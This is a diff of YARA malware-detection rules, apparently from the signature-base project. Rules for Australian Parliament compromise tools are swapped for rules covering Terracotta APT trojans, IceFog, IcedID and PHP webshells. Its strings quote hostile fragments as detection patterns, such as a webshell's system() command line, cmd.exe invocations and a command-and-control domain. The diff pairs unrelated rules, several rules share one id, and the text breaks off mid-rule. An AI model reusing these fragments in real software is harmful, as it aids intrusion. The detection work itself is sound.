+rule SIGNATURE_BASE_Apolmy_Privesc_Trojan : FILE
 {
 	meta:
-		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
+		description = "Apolmy Privilege Escalation Trojan used in APT Terracotta"
 		author = "Florian Roth (Nextron Systems)"
-		id = "59b3f6aa-2d3b-54b4-b543-57bd9d981e87"
-		date = "2019-02-18"
+		id = "2f3f496b-ebfe-5a6e-89ad-a24af6378fd7"
+		date = "2015-08-04"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L92-L111"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L11-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fb0e53e5561f7f14f2ad6afcda2798d353cf4d54d12ae3354b03d62ed0c00bf3"
-		score = 75
+		hash = "d7bd289e6cee228eb46a1be1fcdc3a2bd5251bc1eafb59f8111756777d8f373d"
+		logic_hash = "8cce828806d5829735d6ac8d28a48c9b016b96b4370b2f3ac139799a9fe13c4a"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "54a17fb257db2d09d61af510753fd5aa00537638a81d0a8762a5645b4ef977e4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "function DEC(d){return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(d));}" fullword ascii
-		$a2 = "function ENC(d){return Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(d));}" fullword ascii
-		$s1 = "var hash=DEC(Request.Item['" ascii
-		$s2 = "Response.Write(ENC(SET_ASS_SUCCESS));" fullword ascii
-		$s3 = "hashtable[hash] = assCode;" fullword ascii
-		$s4 = "Response.Write(ss);" fullword ascii
-		$s5 = "var hashtable = Application[CachePtr];" fullword ascii
+		$s1 = "[%d] Failed, %08X" fullword ascii
+		$s2 = "[%d] Offset can not fetched." fullword ascii
+		$s3 = "PowerShadow2011" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 2KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Lazycat_Logeraser
+rule SIGNATURE_BASE_Mithozhan_Trojan : FILE
 {
 	meta:
-		description = "Detetcs a tool used in the Australian Parliament House network compromise"
+		description = "Mitozhan Trojan used in APT Terracotta"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a3d74657-a389-5482-ab26-966e790afd50"
-		date = "2019-02-18"
+		id = "5e2b4e08-1a35-5eb0-8c25-a73d45b0e279"
+		date = "2015-08-04"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L113-L135"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L29-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2b4b69dd675172b9b0c08fac674b6daa107535694b4073750501627fb48d12c2"
-		score = 75
-		quality = 35
-		tags = ""
-		hash1 = "1c113dce265e4d744245a7c55dadc80199ae972a9e0ecbd0c5ced57067cf755b"
-		hash2 = "510375f8142b3651df67d42c3eff8d2d880987c0e057fc75a5583f36de34bf0e"
+		hash = "8553b945e2d4b9f45c438797d6b5e73cfe2899af1f9fd87593af4fd7fb51794a"
+		logic_hash = "a7beb030368cc6e1119617991b68e6fa1bf2d1f6eee28e83fef7862313f19d30"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "LazyCat.dll" ascii wide fullword
-		$x2 = ".local_privilege_escalation.rotten_potato" ascii wide
-		$x3 = "LazyCat.Extension" ascii wide
-		$x4 = " MEOWof" ascii wide
-		$x5 = "VirtualSite: {0}, Address: {1:X16}, Name: {2}, Handle: {3:X16}, LogPath: {4}" fullword wide
-		$s1 = "LazyCat" fullword ascii wide
-		$s2 = "$e3ff37f2-85d7-4b24-a385-7eeb1f5a9562"
-		$s3 = "local -> remote {0} bytes"
-		$s4 = "remote -> local {0} bytes"
+		$s1 = "adbrowser" fullword wide
+		$s2 = "IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==" fullword ascii
+		$s3 = "EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Powerkatz_Feb19_1
+rule SIGNATURE_BASE_Remoteexec_Tool : FILE
 {
 	meta:
-		description = "Detetcs a tool used in the Australian Parliament House network compromise"
+		description = "Remote Access Tool used in APT Terracotta"
 		author = "Florian Roth (Nextron Systems)"
-		id = "294d6f6c-dbc8-5431-87a0-64abe582c4ea"
-		date = "2019-02-18"
+		id = "c3262147-3455-554c-88fc-b523352efe7f"
+		date = "2015-08-04"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L137-L152"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L47-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d1d39d68c5c5a3f6142a966925e2a136e937bc09abddd4080862346683886455"
+		hash = "a550131e106ff3c703666f15d55d9bc8c816d1cb9ac1b73c2e29f8aa01e53b78"
+		logic_hash = "951cc65e14c2ff035ccc06d080730b1c25208caa1d30129074a6150557a5cebe"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Powerkatz32" ascii wide fullword
-		$x2 = "Powerkatz64" ascii wide
-		$s1 = "GetData: not found taskName" fullword ascii wide
-		$s2 = "GetRes Ex:" fullword ascii wide
+		$s0 = "cmd.exe /q /c \"%s\"" fullword ascii
+		$s1 = "\\\\.\\pipe\\%s%s%d" fullword ascii
+		$s2 = "This is a service executable! Couldn't start directly." fullword ascii
+		$s3 = "\\\\.\\pipe\\TermHlp_communicaton" fullword ascii
+		$s4 = "TermHlp_stdout" fullword ascii
+		$s5 = "TermHlp_stdin" fullword ascii
 
 	condition:
-		1 of ( $x* ) and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 75KB and 4 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_Unknown_Feb19_1
+rule SIGNATURE_BASE_Liudoor_Malware_1 : FILE
 {
 	meta:
-		description = "Detetcs a tool used in the Australian Parliament House network compromise"
+		description = "Liudoor Trojan used in Terracotta APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bdcadc4b-8881-5dc7-b203-4e79cbc850ed"
-		date = "2019-02-18"
+		id = "ebd5833e-1f5c-5166-aaba-d0be64829e6c"
+		date = "2015-08-04"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L154-L172"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L69-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "231c771ed24106a8daf352a0df1bc2db43ebd8d1108d7fa1162d03d40e738d46"
-		score = 75
+		logic_hash = "9ef9fcc5df910e796d8b015396cf37614982ebbf9be6f6a4a8d271d4263a36a9"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "deed6e2a31349253143d4069613905e1dfc3ad4589f6987388de13e33ac187fc"
+		hash2 = "4575e7fc8f156d1d499aab5064a4832953cd43795574b4c7b9165cdc92993ce5"
+		hash3 = "ad1a507709c75fe93708ce9ca1227c5fefa812997ed9104ff9adfec62a3ec2bb"
 
 	strings:
-		$x1 = "not a valid timeout format!" ascii wide fullword
-		$x2 = "host can not be empty!" ascii wide fullword
-		$x3 = "not a valid port format!" ascii wide fullword
-		$x4 = "{0} - {1} TTL={2} time={3}" ascii wide fullword
-		$x5 = "ping count is not a correct format!" ascii wide fullword
-		$s1 = "The result is too large,program store to '{0}'.Please download it manully." fullword ascii wide
-		$s2 = "C:\\Windows\\temp\\" ascii wide
+		$s1 = "svchostdllserver.dll" fullword ascii
+		$s2 = "SvcHostDLL: RegisterServiceCtrlHandler %S failed" fullword ascii
+		$s3 = "\\nbtstat.exe" ascii
+		$s4 = "DataVersionEx" fullword ascii
 
 	condition:
-		1 of ( $x* ) or 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Base64_Encoded_Hex_Encoded_Code
+rule SIGNATURE_BASE_Liudoor_Malware_2 : FILE
 {
 	meta:
-		description = "Detects hex encoded code that has been base64 encoded"
+		description = "Liudoor Trojan used in Terracotta APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2cfd278f-ff45-5e23-b552-dad688ab303b"
-		date = "2019-04-29"
-		modified = "2025-03-21"
-		reference = "https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L2-L17"
+		id = "30b9d727-ec77-5ead-80dd-6d442478e78b"
+		date = "2015-08-04"
+		modified = "2023-12-05"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L91-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f1451e2dd0e4e70a0f39f609331762cce369642e9fadbef83d932da2a0a6c60b"
-		score = 65
+		logic_hash = "12cc72fb147f2d580f9f9e2a9bdfbec3f7b0e977871a27ccc941cd0b1aaa634c"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f3fb68b21490ded2ae7327271d3412fbbf9d705c8003a195a705c47c98b43800"
+		hash2 = "e42b8385e1aecd89a94a740a2c7cd5ef157b091fabd52cd6f86e47534ca2863e"
 
 	strings:
-		$x1 = { 78 34 4e ?? ?? 63 65 44 ?? ?? 58 48 67 }
-		$x2 = { 63 45 44 ?? ?? 58 48 67 ?? ?? ?? 78 34 4e }
-		$fp1 = "Microsoft Azure Code Signp$"
+		$s0 = "svchostdllserver.dll" fullword ascii
+		$s1 = "Lpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCC" fullword ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Reversed_Base64_Encoded_EXE : FILE
+rule SIGNATURE_BASE_Icefog_Malware_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects an base64 encoded executable with reversed characters"
+		description = "Detects IceFog malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3b52e59e-7c0a-560f-8123-1099c52e7e3d"
-		date = "2020-04-06"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L62-L83"
+		id = "ce8e3a9b-9f4b-534c-983d-bb5490da5768"
+		date = "2018-02-26"
+		modified = "2023-01-06"
+		reference = "https://twitter.com/ClearskySec/status/968104465818669057"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_icefog.yar#L11-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a2f1caf2235ee24f531c9f9a5ebdc0c97a90890218669749a4c83bede80a336"
-		score = 80
+		logic_hash = "8bba0f7f6f6aad6586c2c5ed29f30514d2f88703134f331724cc2ff86ccffe87"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8"
+		hash1 = "480373cffc4e60aa5be2954a156e37d689b92e6e33969958230f2ce59d30b9ec"
 
 	strings:
-		$s1 = "AEAAAAEQATpVT"
-		$s2 = "AAAAAAAAAAoVT"
-		$s3 = "AEAAAAEAAAqVT"
-		$s4 = "AEAAAAIAAQpVT"
-		$s5 = "AEAAAAMAAQqVT"
-		$sh1 = "SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU" ascii
-		$sh2 = "LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR" ascii
-		$sh3 = "uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV" ascii
+		$s1 = "cmd /c %c%s%c" fullword ascii
+		$s2 = "temp.bat" fullword ascii
+		$s3 = "c:\\windows\\debug\\wia\\help" fullword wide
+		$s4 = "/getorder.aspx?hostname=" fullword wide
+		$s5 = "\\filecfg_temp.dat" wide
+		$s6 = "Unknown operating system " fullword wide
+		$s7 = "kastygost.compress.to" fullword wide
+		$s8 = "/downloads/" wide
+		$s9 = "\\key.dat" wide
 
 	condition:
-		filesize < 10000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them
 }
-rule SIGNATURE_BASE_SUSP_Script_Base64_Blocks_Jun20_1
+rule SIGNATURE_BASE_EXPL_Exploit_TLB_Scripts : FILE
 {
 	meta:
-		description = "Detects suspicious file with base64 encoded payload in blocks"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cef759a5-b02a-53e7-bf27-184eee6bc3fa"
-		date = "2020-06-05"
-		modified = "2025-03-21"
-		reference = "https://posts.specterops.io/covenant-v0-5-eee0507b85ba"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L85-L98"
+		description = "Detects malicious TLB files which may be delivered via Visual Studio projects"
+		author = "Rich Warren (slightly modified by Florian Roth)"
+		id = "5151458e-4c30-50ff-a39e-e5b5b68b87aa"
+		date = "2021-01-26"
+		modified = "2023-12-05"
+		reference = "https://github.com/outflanknl/Presentations/blob/master/Nullcon2020_COM-promise_-_Attacking_Windows_development_environments.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_tlb_scripts.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d456cbbbd76f543afe144a2876a02db834aa6b09ecd4d6aa2f25ce8eeac5de8"
-		score = 70
+		logic_hash = "39bf626d60a867d054762043f74e86998d6848439655f84be72003c112db9953"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$sa1 = "<script language=" ascii
-		$sb2 = { 41 41 41 22 2B 0D 0A 22 41 41 41 }
+		$a = ".sct" ascii nocase
+		$b = "script:" ascii nocase
+		$c = "scriptlet:" ascii nocase
+		$d = "soap:" ascii nocase
+		$e = "winmgmts:" ascii nocase
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0x4D534654 and filesize < 100KB and any of them
 }
-rule SIGNATURE_BASE_SUSP_Reversed_Hacktool_Author : FILE
+rule SIGNATURE_BASE_MAL_Icedid_GZIP_LDR_202104 : FILE
 {
 	meta:
-		description = "Detects a suspicious path traversal into a Windows folder"
-		author = "Florian Roth (Nextron Systems)"
-		id = "33e20d75-af07-5df2-82c3-c48aec37a947"
-		date = "2020-06-10"
-		modified = "2025-03-21"
-		reference = "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L100-L114"
+		description = "2021 initial Bokbot / Icedid loader for fake GZIP payloads"
+		author = "Thomas Barabosch, Telekom Security"
+		id = "fbf578e7-c318-5f67-82df-f93232362a23"
+		date = "2021-04-12"
+		modified = "2023-01-27"
+		reference = "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_icedid.yar#L14-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3681fb11dabf9905915d23f4198145b503a260d628415fd79ad71d7703ba9f6f"
-		score = 65
+		logic_hash = "7a7cc6c7dcbf43bace6a1f259af38560327c34386517e719ad81068b2d9b6659"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$x1 = "iwiklitneg" fullword ascii wide
-		$x2 = " eetbus@ " ascii wide
+		$internal_name = "loader_dll_64.dll" fullword
+		$string0 = "_gat=" wide
+		$string1 = "_ga=" wide
+		$string2 = "_gid=" wide
+		$string4 = "_io=" wide
+		$string5 = "GetAdaptersInfo" fullword
+		$string6 = "WINHTTP.dll" fullword
+		$string7 = "DllRegisterServer" fullword
+		$string8 = "PluginInit" fullword
+		$string9 = "POST" wide fullword
+		$string10 = "aws.amazon.com" wide fullword
 
 	condition:
-		filesize < 4000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( $internal_name or all of ( $s* ) ) or all of them
 }
-rule SIGNATURE_BASE_SUSP_Base64_Encoded_Hacktool_Dev : FILE
+rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi_3
 {
 	meta:
-		description = "Detects a suspicious base64 encoded keyword"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6dc7db4b-a614-51e4-a9a5-f869154dbbb1"
-		date = "2020-06-10"
+		description = "Web Shell - file h4ntu shell powered by tsoi.php"
+		author = "Florian Roth"
+		id = "2a493748-85eb-561e-98b3-0eed82026510"
+		date = "2014-01-28"
 		modified = "2025-03-21"
-		reference = "https://twitter.com/cyb3rops/status/1270626274826911744"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L116-L136"
+		old_rule_name = "Webshell_h4ntu_shell_powered_by_tsoi_"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L32-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7345a528a12f87e5cbcabccf649566a038dd2115e8aec4f39599e357c8c6d57f"
-		score = 65
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+		logic_hash = "871e9a057ca3920fcebaec5c2555c2d936d813c0d8bb2a6a69726dee7a796ff8"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = "QGdlbnRpbGtpd2" ascii wide
-		$ = "BnZW50aWxraXdp" ascii wide
-		$ = "AZ2VudGlsa2l3a" ascii wide
-		$ = "QGhhcm1qMH" ascii wide
-		$ = "BoYXJtajB5" ascii wide
-		$ = "AaGFybWowe" ascii wide
-		$ = "IEBzdWJ0ZW" ascii wide
-		$ = "BAc3VidGVl" ascii wide
-		$ = "gQHN1YnRlZ" ascii wide
+		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
+		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
+		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
 
 	condition:
-		filesize < 6000KB and 1 of them
+		2 of them
 }
-
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi : FILE
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fc997540-075e-5f1c-9238-135c1572553b"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L12-L29"
+		description = "Semi-Auto-generated - file h4ntu shell [powered by tsoi].txt"
+		author = "Florian Roth"
+		id = "0e38b0fc-721a-5591-aeb7-f9dca45b7114"
+		date = "2014-03-29"
+		modified = "2025-03-21"
+		old_rule_name = "Webshell_h4ntu_shell__powered_by_tsoi_"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0cbdc156b7080608c1071feeb4826a70bb259c55139d74d019465c4bb5244260"
-		score = 75
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+		logic_hash = "3d9b568a66f3e6933b385fed30921883dd7be17863670c648702ae3403b6e8a1"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "6c52a5850a57bea43a0a52ff0e2d2179653b97ae5406e884aee63e1cf340f58b"
 
 	strings:
-		$x1 = "%SystemRoot%\\System32\\thinmon.dll" fullword ascii
-		$s2 = "'Cannot delete list entry (fatal error)!9The module %s cannot be executed on this system (0x%.4x).%Enumerate all sessions on TSE" wide
-		$s8 = "cbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbe" ascii
-		$s14 = "configure the service" fullword wide
+		$x1 = "<title>h4ntu shell"
+		$x2 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and pe.imphash ( ) == "98d1ad672d0db4b4abdcda73cc9835cb" and all of them
+		filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_2 : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Sql
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
+		description = "Web Shell - file sql.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "50830741-ba3d-505c-bb21-8cedc2162f96"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L31-L44"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L65-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "600bc5b423ef3281bfc7ad7ab479aa1208b0144b0f4afd8c2d14f17b5e2c600b"
-		score = 75
+		hash = "2cf20a207695bbc2311a998d1d795c35"
+		logic_hash = "83049c3c5bce88d239b59accb173e234c3169f59187de17b7e6c2a0aa58a552f"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "c6a54912f77a39c8f909a66a940350dcd8474c7a1d0e215a878349f1b038c58a"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "WioGLtonuaptWmrnttfepgetneemVsnygnV" fullword ascii
-		$s2 = "PnSenariopoeKerGEtxrcy" fullword ascii
+		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
+		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_3 : FILE
+rule SIGNATURE_BASE_Webshell_PHP_A
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
+		description = "Web Shell - file a.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc365dbf-1448-5219-95f5-d1154000f52d"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L46-L60"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L80-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f4851f5381a4d8dea488d50ff11048052826c51428f8610bc5d3480ed254d32f"
-		score = 75
+		hash = "e3b461f7464d81f5022419d87315a90d"
+		logic_hash = "6bdd5fbe9b16f2d84b884239cf3b6453587933c6b0c4308508d10019b4f36e38"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "USQTUNPPQONOPOQUMSNUTRMRRLVPUOPMROPMPMQTPNPONVUOUQOMMNNSRSRQQVTPPRSSNVSTURTMMOPTONSQTOMONQVMQNUSONTQTUTSRRPVTONUQNORQMRRNRUSPS" fullword ascii
-		$x2 = "tEMPiuP" fullword ascii
-		$x3 = "sryCEMieye" fullword ascii
+		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
+		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
+		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+		2 of them
 }
-
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_4 : FILE
+rule SIGNATURE_BASE_Webshell_Imhapftp_2
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
+		description = "Web Shell - file iMHaPFtp.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1a2df257-a639-5868-a005-690d64cfbf2b"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L62-L82"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L96-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c845be8b56dc9aa9f0eaec2a67c4baef9c9b4fd1789e96cd781e3876721b1297"
-		score = 75
+		hash = "12911b73bc6a5d313b494102abcf5c57"
+		logic_hash = "9099504870c1e466808060f11aea38472832846d24e3c84fdd69b7d26bfed69d"
+		score = 70
 		quality = 85
-		tags = "FILE"
